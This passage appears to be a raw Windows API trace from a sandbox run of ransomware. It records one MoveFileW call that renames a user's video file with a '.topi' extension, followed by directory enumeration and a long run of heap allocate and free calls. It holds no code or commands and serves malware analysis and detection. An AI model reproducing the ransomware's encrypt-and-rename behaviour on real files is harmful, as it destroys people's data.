1 [0097.927] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.927] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.927] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.927] CloseHandle (hObject=0x6a8) returned 1 [0097.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0097.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0097.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0097.931] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\tyepReLf6GWyO0HkO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\tyeprelf6gwyo0hko.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\tyepReLf6GWyO0HkO.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\tyeprelf6gwyo0hko.avi.topi")) returned 1 [0097.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.932] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.933] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c0deff0, ftCreationTime.dwHighDateTime=0x1d5c451, ftLastAccessTime.dwLowDateTime=0x5d218700, ftLastAccessTime.dwHighDateTime=0x1d5b5a4, ftLastWriteTime.dwLowDateTime=0x5d218700, ftLastWriteTime.dwHighDateTime=0x1d5b5a4, nFileSizeHigh=0x0, nFileSizeLow=0x891e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tyepReLf6GWyO0HkO.avi", cAlternateFileName="TYEPRE~1.AVI")) returned 0 [0097.933] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.934] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ed08 [0097.934] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.936] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.936] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.937] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.937] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.938] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.939] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ec50 | out: hHeap=0x680000) returned 1 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xb0) returned 0x311ec50 [0097.940] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) 